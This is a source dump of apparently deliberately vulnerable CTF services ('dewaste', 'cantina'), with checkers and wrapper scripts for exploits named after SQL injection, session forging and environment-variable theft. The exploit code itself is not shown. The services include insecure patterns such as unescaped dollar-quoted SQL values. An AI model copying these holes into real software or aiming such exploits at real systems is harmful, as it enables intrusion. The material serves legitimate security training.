fastapi==0.83.0 4 | h11==0.13.0 5 | idna==3.3 6 | pydantic==1.10.2 7 | PyYAML==6.0 8 | sniffio==1.3.0 9 | starlette==0.19.1 10 | typing_extensions==4.3.0 11 | uvicorn==0.18.3 12 | cryptography # NOTE(review): this entry and msgpack below carry no version pin, unlike the eleven entries above 13 | msgpack 14 | -------------------------------------------------------------------------------- /cantina/src/components/userdb-back/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | python /app/cleanup.py & 3 | uvicorn main:app --host 0.0.0.0 --port 10026 --reload --debug # NOTE(review): --reload and --debug look like development settings left on for a service bound to 0.0.0.0; confirm they are intended in the deployed image 4 |
-------------------------------------------------------------------------------- /cantina/src/components/userdb-back/schema.sql: -------------------------------------------------------------------------------- 1 | CREATE TABLE IF NOT EXISTS users ( 2 | id INTEGER PRIMARY KEY AUTOINCREMENT, 3 | created TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP, 4 | username TEXT NOT NULL UNIQUE, 5 | authtoken TEXT NOT NULL 6 | ); 7 | -------------------------------------------------------------------------------- /cantina/src/components/userdb-proxy/go.mod: -------------------------------------------------------------------------------- 1 | module cantina/user-db 2 | 3 | go 1.19 4 | 5 | require ( 6 | cantina/common v0.0.0-00010101000000-000000000000 7 | github.com/vmihailenco/msgpack/v5 v5.3.5 8 | golang.org/x/exp v0.0.0-20220909182711-5c715a9e8561 9 | ) 10 | 11 | require ( 12 | github.com/vmihailenco/tagparser/v2 v2.0.0 // indirect 13 | golang.org/x/crypto v0.0.0-20220829220503-c86fa9a7ed90 // indirect 14 | golang.org/x/sys v0.0.0-20220907062415-87db552b00fd // indirect 15 | ) 16 | 17 | replace cantina/common => ../gocommon 18 | -------------------------------------------------------------------------------- /cantina/src/components/userdb-proxy/udb/structs.go: -------------------------------------------------------------------------------- 1 | package udb 2 | 3 | import ( 4 | "cantina/common/canopy" 5 | "cantina/common/cipher" 6 | "cantina/common/kex" 7 | "log" 8 | ) 9 | 10 | type Env struct { 11 | SymmCipher *cipher.Cipher 12 | KeyExchange *kex.Client 13 | Log *log.Logger 14 | 15 | JukeboxRequest *canopy.Server 16 | JukeboxReplyBuilder canopy.ReplyBuilder 17 | 18 | UserRequest *canopy.Server 19 | UserRequestBuilder canopy.ReplyBuilder 20 | UserRequestSession canopy.SessionInitialization 21 | 22 | DataDir string 23 | } 24 | -------------------------------------------------------------------------------- /dewaste/.gitignore: 
-------------------------------------------------------------------------------- 1 | /**/.idea/ 2 | /**/vendor/ -------------------------------------------------------------------------------- /dewaste/checkers/checker1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | COPY requirements.txt /checker/requirements.txt 7 | RUN pip install -r requirements.txt 8 | 9 | COPY checker.py /checker/checker.py 10 | COPY dejavu.ttf /checker/dejavu.ttf 11 | USER ctf-checkermaster 12 | ENV CTF_CHECKERSCRIPT /checker/checker.py 13 | 14 | # set this to _checker 15 | ENV CTF_SERVICE dewaste_checker1 16 | 17 | WORKDIR /tmp 18 | -------------------------------------------------------------------------------- /dewaste/checkers/checker1/README.md: -------------------------------------------------------------------------------- 1 | ### Building and running the checker 2 | 3 | Run the application (from `/dist`) 4 | ``` 5 | docker-compose up 6 | ``` 7 | 8 | Run the checker for one tick (from `/checker/checker1`) 9 | ``` 10 | TICK=0 docker-compose up 11 | ``` 12 | 13 | This will do the following: 14 | 15 | - call place_flag for the current tick 16 | - call check_service 17 | - call check_flag for up to 5 previous ticks (one invocation per tick) 18 | 19 | To test that checking previous ticks works, call the checker with increasing tick numbers: 20 | ``` 21 | TICK=1 docker-compose up # checked ticks: 0, 1 22 | TICK=2 docker-compose up # checked ticks: 0, 1, 2 23 | TICK=3 docker-compose up # checked ticks: 0, 1, 2, 3 24 | TICK=4 docker-compose up # checked ticks: 0, 1, 2, 3, 4 25 | TICK=5 docker-compose up # checked ticks: 0, 1, 2, 3, 4, 5 26 | TICK=6 docker-compose up # checked ticks: 1, 2, 3, 4, 5, 6 27 | ... 
28 | ``` 29 | -------------------------------------------------------------------------------- /dewaste/checkers/checker1/dejavu.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/checkers/checker1/dejavu.ttf -------------------------------------------------------------------------------- /dewaste/checkers/checker1/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | checker: 5 | build: . 6 | command: localhost 1 ${TICK} # ip, team, tick 7 | network_mode: host 8 | volumes: 9 | - tmpstore:/tmp 10 | 11 | volumes: 12 | tmpstore: 13 | -------------------------------------------------------------------------------- /dewaste/checkers/checker1/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | beautifulsoup4 3 | Faker==15.0.0 4 | Pillow==9.2.0 5 | -------------------------------------------------------------------------------- /dewaste/checkers/checker1/run-first-view-ticks.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | max="$1" 4 | if [ -z "$max" ]; then 5 | max=6 6 | fi 7 | 8 | docker-compose build 9 | for i in $(seq 0 $max); do 10 | TICK=$i docker-compose up 11 | done 12 | -------------------------------------------------------------------------------- /dewaste/checkers/checker2/README.md: -------------------------------------------------------------------------------- 1 | ### Building and running the checker 2 | 3 | Run the application (from `/dist`) 4 | ``` 5 | docker-compose up 6 | ``` 7 | 8 | Run the checker for one tick (from `/checker/checker2`) 9 | ``` 10 | TICK=0 docker-compose up 11 | ``` 12 | 13 | This will do the following: 14 | 15 | - call place_flag for the current tick 16 | - call check_service 17 | - call 
check_flag for up to 5 previous ticks (one invocation per tick) 18 | 19 | To test that checking previous ticks works, call the checker with increasing tick numbers: 20 | ``` 21 | TICK=1 docker-compose up # checked ticks: 0, 1 22 | TICK=2 docker-compose up # checked ticks: 0, 1, 2 23 | TICK=3 docker-compose up # checked ticks: 0, 1, 2, 3 24 | TICK=4 docker-compose up # checked ticks: 0, 1, 2, 3, 4 25 | TICK=5 docker-compose up # checked ticks: 0, 1, 2, 3, 4, 5 26 | TICK=6 docker-compose up # checked ticks: 1, 2, 3, 4, 5, 6 27 | ... 28 | ``` 29 | -------------------------------------------------------------------------------- /dewaste/checkers/checker2/dejavu.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/checkers/checker2/dejavu.ttf -------------------------------------------------------------------------------- /dewaste/checkers/checker2/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | checker: 5 | build: . 
6 | command: localhost 1 ${TICK} # ip, team, tick 7 | network_mode: host 8 | -------------------------------------------------------------------------------- /dewaste/checkers/checker2/requirements.txt: -------------------------------------------------------------------------------- 1 | selenium==4.4.3 2 | Pillow==9.2.0 3 | -------------------------------------------------------------------------------- /dewaste/checkers/checker2/run_dev.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | docker run -t -i --network=host --env DISPLAY=$DISPLAY --volume $XAUTH:/root/.Xauthority -v "$(pwd)":/checker dewaste2:latest localhost 1 0 4 | -------------------------------------------------------------------------------- /dewaste/dewaste.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dewaste.png -------------------------------------------------------------------------------- /dewaste/dist/README.md: -------------------------------------------------------------------------------- 1 | # dewaste 2 | 3 | ## Flag IDs 4 | A short disclaimer about the flag IDs for flagstore 1. 5 | 6 | There is additional structure to the flag ids. Depending on the start of the flag id string, the flag is stored differently. 7 | 8 | Flag id types (everything before the first '-'): 9 | * physical_acc: `physical_acc-{email}-{item_id}` 10 | * physical_noacc: `physical_noacc-{item_id}` 11 | * digital_acc: `digital_acc-{email}-{item_id}` 12 | * digital_noacc: `digital_noacc-{item_id}` 13 | 14 | In this format you find: 15 | * Which type of item you are looking for (physical or digital) 16 | * The id of the item that you are looking for 17 | * In case an account is used to register the item, you have the email address of the registering user account 18 | 19 | Flagstore 2 does not have any flag ID associated. 
20 | 21 | Happy hacking! 22 | -------------------------------------------------------------------------------- /dewaste/dist/db/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM postgres:14.5 2 | COPY ./schema.sql /docker-entrypoint-initdb.d/schema.sql 3 | -------------------------------------------------------------------------------- /dewaste/dist/web/.dockerignore: -------------------------------------------------------------------------------- 1 | /vendor/ 2 | /.idea/ -------------------------------------------------------------------------------- /dewaste/dist/web/composer.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "rinux/ecsc2022", 3 | "type": "project", 4 | "autoload": { 5 | "psr-4": { 6 | "App\\": "App/" 7 | } 8 | }, 9 | "autoload-dev": { 10 | "psr-4": { 11 | "App\\": "src/App/" 12 | } 13 | }, 14 | "require": { 15 | "ext-openssl": "*", 16 | "ext-pdo": "*", 17 | "fortawesome/font-awesome": "6.1.2", 18 | "psr/container": "2.0.2", 19 | "psr/log": "3", 20 | "twbs/bootstrap": "5.2.0" 21 | }, 22 | "require-dev": { 23 | "squizlabs/php_codesniffer": "^3.5", 24 | "phpstan/phpstan": "^1.8.2" 25 | }, 26 | "scripts": { 27 | "dev:lint": "phpcs -s src/", 28 | "dev:fix-lint": "phpcbf src/" 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /dewaste/dist/web/docker/app-cron.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | cmd="/usr/local/bin/php /var/www/html/cli.php" 4 | 5 | i=0 6 | while [ true ] 7 | do 8 | if [[ $i -eq 12 ]]; then 9 | $cmd --cleanup-files --cleanup-database 10 | i=0 11 | fi 12 | 13 | $cmd --process-data-item 14 | 15 | sleep 5 16 | 17 | i=$((i+1)) 18 | done 19 | -------------------------------------------------------------------------------- /dewaste/dist/web/docker/entrypoint.sh: 
-------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo "Starting background tasks" 4 | /app-cron.sh & 5 | 6 | echo "Starting server" 7 | apache2-foreground -------------------------------------------------------------------------------- /dewaste/dist/web/phpcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | src/ 4 | 5 | 6 | 7 | 8 | 9 | *Clause.php 10 | 11 | 12 | */config.php 13 | 14 | -------------------------------------------------------------------------------- /dewaste/dist/web/phpstan.neon: -------------------------------------------------------------------------------- 1 | parameters: 2 | level: 9 3 | paths: 4 | - src 5 | excludePaths: 6 | - src/common.php 7 | bootstrapFiles: 8 | - src/common.php 9 | ignoreErrors: 10 | - '/Parameter #1 \$row of method App\\Persistence\\[a-zA-Z\\]+DAO::parseRow\(\) expects array.*, mixed given/' -------------------------------------------------------------------------------- /dewaste/dist/web/src/.htaccess: -------------------------------------------------------------------------------- 1 | RewriteEngine On 2 | 3 | RewriteCond %{REQUEST_FILENAME} !-d 4 | RewriteCond %{REQUEST_FILENAME} !-f 5 | RewriteRule .* index.php [L] -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Controllers/RankingController.php: -------------------------------------------------------------------------------- 1 | rankingService->getCurrentRanking(); 21 | $rankingTemplate = $this->template->dynamicTemplate("ranking.php", ranking: $ranking); 22 | return $this->template->withMainLayout("Ranking", $rankingTemplate); 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Model/Analysis/AnalysisResult.php: -------------------------------------------------------------------------------- 1 | */ 8 | public array $deserializers = 
[]; 9 | 10 | public function addDeserializer(string $type, callable $method): void 11 | { 12 | $this->deserializers[$type] = $method; 13 | } 14 | 15 | public function create(string $type, string $serializedResult): AnalysisResult 16 | { 17 | $d = $this->deserializers[$type] ?? throw new \InvalidArgumentException("Unknown type: $type"); 18 | return $d($serializedResult); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Model/Analysis/FileAnalysisResult.php: -------------------------------------------------------------------------------- 1 | output; 17 | } 18 | 19 | public function renderData(): string 20 | { 21 | return $this->output; 22 | } 23 | 24 | public static function deserialize(string $data): self 25 | { 26 | return new self($data); 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Model/Controller.php: -------------------------------------------------------------------------------- 1 | baseUrl; 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Model/DigitalItemStatus.php: -------------------------------------------------------------------------------- 1 | question = $question; 13 | $this->answer = $answer; 14 | } 15 | 16 | public function getQuestion(): string 17 | { 18 | return $this->question; 19 | } 20 | 21 | public function getAnswer(): string 22 | { 23 | return $this->answer; 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Model/PhysicalItemStatus.php: -------------------------------------------------------------------------------- 1 | target; 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Persistence/DatabaseManager.php: 
-------------------------------------------------------------------------------- 1 | host;port=5432;dbname=$this->name;", $this->user, $this->password); 18 | $db->setAttribute(\PDO::ATTR_ERRMODE, \PDO::ERRMODE_EXCEPTION); 19 | $db->setAttribute(\PDO::ATTR_EMULATE_PREPARES, true); 20 | return $db; 21 | } 22 | } 23 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Persistence/PDO.php: -------------------------------------------------------------------------------- 1 | |null $options 14 | */ 15 | public function __construct(string $dsn, ?string $username = null, ?string $password = null, ?array $options = null) 16 | { 17 | parent::__construct($dsn, $username, $password, $options); 18 | } 19 | 20 | public function getQueryBuilder(): QueryBuilder 21 | { 22 | return new QueryBuilder($this); 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Persistence/ParseResultsTrait.php: -------------------------------------------------------------------------------- 1 | 13 | */ 14 | private function parseResults(\PDOStatement $stmt): array 15 | { 16 | $ret = []; 17 | while ($row = $stmt->fetch(\PDO::FETCH_ASSOC)) { 18 | $ret[] = $this->parseRow($row); 19 | } 20 | return $ret; 21 | } 22 | 23 | /** 24 | * @param array $row 25 | * @return T 26 | */ 27 | abstract protected function parseRow(array $row): object; 28 | } 29 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Persistence/QueryBuilder/AbstractClause.php: -------------------------------------------------------------------------------- 1 | generateRec("a", (mt_rand() % 20) + 1); 12 | } 13 | 14 | private function generateRec(string $x, int $level): string 15 | { 16 | if ($level === 0) { 17 | return $x; 18 | } 19 | $x .= substr(self::CHARSET, mt_rand() % strlen(self::CHARSET), 1); 20 | return $this->generateRec($x, $level - 1); 21 | } 22 | } 
23 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Persistence/QueryBuilder/AndClause.php: -------------------------------------------------------------------------------- 1 | clauses = $clauses; 13 | } 14 | 15 | public function _or(AbstractClause $clause): AbstractClause 16 | { 17 | return new OrClause($this, $clause); 18 | } 19 | 20 | public function _and(AbstractClause $clause): AbstractClause 21 | { 22 | $this->clauses[] = $clause; 23 | return $this; 24 | } 25 | 26 | public function render(): string 27 | { 28 | return "(" . implode(" AND ", array_map(fn($x) => $x->render(), $this->clauses)) . ")"; 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Persistence/QueryBuilder/OrClause.php: -------------------------------------------------------------------------------- 1 | clauses = $clauses; 13 | } 14 | 15 | 16 | public function _or(AbstractClause $clause): OrClause 17 | { 18 | $this->clauses[] = $clause; 19 | return $this; 20 | } 21 | 22 | public function _and(AbstractClause $clause): AndClause 23 | { 24 | return new AndClause($this, $clause); 25 | } 26 | 27 | public function render(): string 28 | { 29 | return "(" . implode(" OR ", array_map(fn($x) => $x->render(), $this->clauses)) . ")"; 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Persistence/QueryBuilder/Value.php: -------------------------------------------------------------------------------- 1 | value)) { 14 | $enclosing = (new AlnumGenerator())->generate(); 15 | return "\$$enclosing\$" . $this->value . "\$$enclosing\$"; 16 | } elseif (is_int($this->value) || is_float($this->value)) { 17 | return "$this->value"; 18 | } 19 | throw new \AssertionError("Not a valid value type: " . 
get_debug_type($this->value)); 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Service/Analysis/AnalysisMethod.php: -------------------------------------------------------------------------------- 1 | 21 | */ 22 | abstract public function run(?User $user, DigitalItem $item, string $data): array; 23 | } 24 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/App/Service/SessionService.php: -------------------------------------------------------------------------------- 1 | ensureStarted(); 21 | if ($user !== null) { 22 | $_SESSION[self::USER_KEY] = $user; 23 | } else { 24 | unset($_SESSION[self::USER_KEY]); 25 | } 26 | } 27 | 28 | public function getUser(): ?User 29 | { 30 | $this->ensureStarted(); 31 | return $_SESSION[self::USER_KEY] ?? null; 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/fonts/LDIxapCSOBg7S-QT7p4GM-aUWA.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/fonts/LDIxapCSOBg7S-QT7p4GM-aUWA.woff2 -------------------------------------------------------------------------------- /dewaste/dist/web/src/fonts/LDIxapCSOBg7S-QT7p4HM-Y.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/fonts/LDIxapCSOBg7S-QT7p4HM-Y.woff2 -------------------------------------------------------------------------------- /dewaste/dist/web/src/fonts/LDIxapCSOBg7S-QT7p4JM-aUWA.woff2: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/fonts/LDIxapCSOBg7S-QT7p4JM-aUWA.woff2 -------------------------------------------------------------------------------- /dewaste/dist/web/src/fonts/m8JXjfVPf62XiF7kO-i9YL1la1OD.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/fonts/m8JXjfVPf62XiF7kO-i9YL1la1OD.woff2 -------------------------------------------------------------------------------- /dewaste/dist/web/src/fonts/m8JXjfVPf62XiF7kO-i9YLNlaw.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/fonts/m8JXjfVPf62XiF7kO-i9YLNlaw.woff2 -------------------------------------------------------------------------------- /dewaste/dist/web/src/fonts/pxiKyp0ihIEF2isfFJU.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/fonts/pxiKyp0ihIEF2isfFJU.woff2 -------------------------------------------------------------------------------- /dewaste/dist/web/src/img/founders.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/img/founders.jpg -------------------------------------------------------------------------------- /dewaste/dist/web/src/img/hills.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/img/hills.jpg 
-------------------------------------------------------------------------------- /dewaste/dist/web/src/pages/login.php: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 |
9 |
10 | 11 | 13 |
14 |
15 | 16 | 17 |
18 | 19 |
20 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/pages/recycle/myitem_physical.php: -------------------------------------------------------------------------------- 1 | 8 | 9 |

Item

10 | 11 |
Type:
12 |
Physical
13 | 14 |
S/N:
15 |
serial ?? "") ?>
16 | 17 |
Dimensions:
18 |
length/$item?->width/$item?->height"?> cm
19 | 20 |
Weight:
21 |
weight?> kg
22 | 23 |
Status:
24 |
status->value ?? "")?>
25 | 26 |
Description:
27 |
description ?? "")?>
28 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/pages/recycle/registration_template.php: -------------------------------------------------------------------------------- 1 | 8 |

Recycle

9 |

10 | can recycle electronic junk and old archives. If you are interested in our 11 | physical and digital processing methodology, please visit the 12 | FAQ page. 13 | 14 | 15 |

25 | 26 | -------------------------------------------------------------------------------- /dewaste/dist/web/src/pyodide/micropip-0.1-py3-none-any.whl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/pyodide/micropip-0.1-py3-none-any.whl -------------------------------------------------------------------------------- /dewaste/dist/web/src/pyodide/packaging-21.3-py3-none-any.whl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/pyodide/packaging-21.3-py3-none-any.whl -------------------------------------------------------------------------------- /dewaste/dist/web/src/pyodide/pyodide.asm.data: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/pyodide/pyodide.asm.data -------------------------------------------------------------------------------- /dewaste/dist/web/src/pyodide/pyodide.asm.wasm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/pyodide/pyodide.asm.wasm -------------------------------------------------------------------------------- /dewaste/dist/web/src/pyodide/pyparsing-3.0.9-py3-none-any.whl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/dewaste/dist/web/src/pyodide/pyparsing-3.0.9-py3-none-any.whl -------------------------------------------------------------------------------- /dewaste/exploits/README.md: 
-------------------------------------------------------------------------------- 1 | Each of the provided exploits has a Dockerfile attached. 2 | To build and run the exploits you can use the provided `run.sh` 3 | 4 | Usage: `./run.sh ` 5 | 6 | Example: `./run.sh 10.2.0.2 test@example.com` -------------------------------------------------------------------------------- /dewaste/exploits/broken_auth/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3 2 | RUN pip3 install beautifulsoup4 3 | RUN pip3 install requests 4 | 5 | RUN mkdir -p /app 6 | WORKDIR "/app" 7 | 8 | COPY exploit.py ./ 9 | CMD python3 exploit.py -------------------------------------------------------------------------------- /dewaste/exploits/broken_auth/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | host="$1" 4 | startid="$2" 5 | 6 | IMAGENAME="exploit-broken-auth" 7 | 8 | docker build -t "$IMAGENAME" . && docker run --rm -it -e "target=$host" -e "startid=$startid" "$IMAGENAME" 9 | -------------------------------------------------------------------------------- /dewaste/exploits/session-forging/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3 2 | RUN pip3 install beautifulsoup4 3 | RUN pip3 install requests 4 | 5 | RUN mkdir -p /app 6 | WORKDIR "/app" 7 | 8 | COPY exploit.py ./ 9 | CMD python3 exploit.py -------------------------------------------------------------------------------- /dewaste/exploits/session-forging/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | host="$1" 4 | flagid="$2" 5 | 6 | IMAGENAME="exploit-session-forging" 7 | 8 | docker build -t "$IMAGENAME" . 
&& docker run --rm -it -e "target=$host" -e "flagid=$flagid" "$IMAGENAME" 9 | -------------------------------------------------------------------------------- /dewaste/exploits/sqli_faq/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:8.0-cli 2 | RUN apt-get update && apt-get install -y curl 3 | 4 | RUN mkdir -p /app 5 | WORKDIR "/app" 6 | 7 | COPY exploit.php ./ 8 | CMD php exploit.php -------------------------------------------------------------------------------- /dewaste/exploits/sqli_faq/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | host="$1" 4 | 5 | IMAGENAME="exploit-sqli-faq" 6 | 7 | docker build -t "$IMAGENAME" . && docker run --rm -it -e "TARGET=$host" "$IMAGENAME" 8 | -------------------------------------------------------------------------------- /dewaste/exploits/sqli_login/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3 2 | RUN pip3 install beautifulsoup4 3 | RUN pip3 install requests 4 | 5 | RUN mkdir -p /app 6 | WORKDIR "/app" 7 | 8 | COPY exploit.py ./ 9 | CMD python3 exploit.py -------------------------------------------------------------------------------- /dewaste/exploits/sqli_login/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | host="$1" 4 | flagid="$2" 5 | 6 | IMAGENAME="exploit-sqli-login" 7 | 8 | docker build -t "$IMAGENAME" . 
&& docker run --rm -it -e "target=$host" -e "flagid=$flagid" "$IMAGENAME" 9 | -------------------------------------------------------------------------------- /dewaste/exploits/steal_env_variable/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3 2 | RUN pip3 install beautifulsoup4 3 | RUN pip3 install requests 4 | 5 | RUN mkdir -p /app 6 | WORKDIR "/app" 7 | 8 | COPY exploit.py ./ 9 | CMD python3 exploit.py -------------------------------------------------------------------------------- /dewaste/exploits/steal_env_variable/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | host="$1" 4 | flagid="$2" 5 | 6 | IMAGENAME="exploit-steal-envs" 7 | 8 | docker build -t "$IMAGENAME" . && docker run --rm -it -e "target=$host" -e "flagid=$flagid" "$IMAGENAME" 9 | -------------------------------------------------------------------------------- /dewaste/meta.env: -------------------------------------------------------------------------------- 1 | SERVICE_NAME=dewaste 2 | -------------------------------------------------------------------------------- /dewaste/report_app/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.8-alpine 3 | 4 | # update and install sqlite3 and building toolchain for cryptography 5 | RUN apk update && apk add --upgrade sqlite build-base libffi-dev 6 | 7 | # switch working directory 8 | WORKDIR /app 9 | 10 | # copy every content from the local file to the image 11 | COPY . 
/app 12 | 13 | # install the dependencies and packages in the requirements file 14 | RUN pip install -r requirements.txt 15 | 16 | # create a new DB 17 | RUN rm -f report.db 18 | RUN sqlite3 report.db < schema.sql 19 | 20 | ENTRYPOINT [ "python" ] 21 | CMD [ "report.py" ] -------------------------------------------------------------------------------- /dewaste/report_app/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | networks: 4 | external: 5 | name: gamenet 6 | 7 | services: 8 | dewaste-report-app: 9 | restart: always 10 | build: . 11 | ports: 12 | - "11111:5000" 13 | networks: 14 | - external 15 | logging: 16 | driver: "json-file" 17 | options: 18 | max-size: 10m 19 | max-file: "3" 20 | -------------------------------------------------------------------------------- /dewaste/report_app/pow_cracker.py: -------------------------------------------------------------------------------- 1 | #!/bin/env python3 2 | 3 | from os import urandom 4 | from hashlib import sha256 5 | from base64 import b64encode 6 | 7 | def crack(salt, suffix): 8 | seq = b'' 9 | while not sha256(salt + seq).digest().endswith(suffix): 10 | seq = urandom(8) 11 | return b64encode(seq) 12 | 13 | # example 14 | print(crack(b'\xbd\xc8\x1a\x0b\r\x04\x93\x08', b'\xc2\xb5\xaf')) -------------------------------------------------------------------------------- /dewaste/report_app/public_key.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAq53hKJ3NpItm7MnJ8Zns 3 | TP9G2vOGE84L1NgTx1WSSknoF5ZuTTBjzVnlH94Q3aDRRw5Q4CQ3yT6auPWM47EU 4 | ur8Pm08EGBUcxUm0IRjdySts0bETZzngZS/Usr5Yj1dSa3WTuncKW2siNNsVVCv8 5 | Di3B/roRDvq/RqdN3qsIRlsWgM5h18I7KZ/YPCsDA5g7vhyFoBlM1+f4m7mMJd/d 6 | hRA7ZOgpwYIDbY2Yncbg+VyBMPNLkwsOU8jWe7KY+KY/xiqVr02lMg0jXc6lY0zZ 7 | 8xV9xiXa87viYucgsjtVhO5fPZFAreBt92Z3tXDBLyv2kjOmAtrfpGJ8Ax8C3yyo 8 | 
YPEBYw+xvRPxcM0XVKJh07OZxBTb3YqO6+uI/PL55Piu2eDDaM4kt/RD/cD3hJ1r 9 | HTewRmmYJ6SoUj/Qt1MachALtvk+ZZhL+tie0ER4VT8rYvO7+OP87bIsnxYDDNam 10 | ZCYi7Qw9lNGm/sLGk6sHArGyMUrvjFzQlddNugHW9Oogkl87Bqf1C9hLtbL0S7VD 11 | H0TEHQbR9Jh+wkweJ0pFT/hgrN56jWDdKjsSPWeTWxlPckKeHO1OfTeczznLLoDU 12 | ZQe08JYgMLyr23Jt1eEfoqcOXoC2RlrNmW9fw4Pw07ETMxN1uE6TdMpxa5Nk+5cW 13 | rQPY6e/7lAERxMwyP2R1BNsCAwEAAQ== 14 | -----END PUBLIC KEY----- 15 | -------------------------------------------------------------------------------- /dewaste/report_app/requirements.txt: -------------------------------------------------------------------------------- 1 | cachelib==0.9.0 2 | cffi==1.15.1 3 | click==8.1.3 4 | cryptography==38.0.1 5 | Flask==2.2.2 6 | Flask-Session==0.4.0 7 | importlib-metadata==4.12.0 8 | itsdangerous==2.1.2 9 | Jinja2==3.1.2 10 | MarkupSafe==2.1.1 11 | pycparser==2.21 12 | Werkzeug==2.2.2 13 | zipp==3.8.1 14 | -------------------------------------------------------------------------------- /dewaste/report_app/schema.sql: -------------------------------------------------------------------------------- 1 | CREATE TABLE IF NOT EXISTS links( 2 | id INTEGER PRIMARY KEY, 3 | url TEXT NOT NULL, 4 | uuid TEXT NOT NULL UNIQUE, 5 | visited INTEGER NOT NULL DEFAULT 0 6 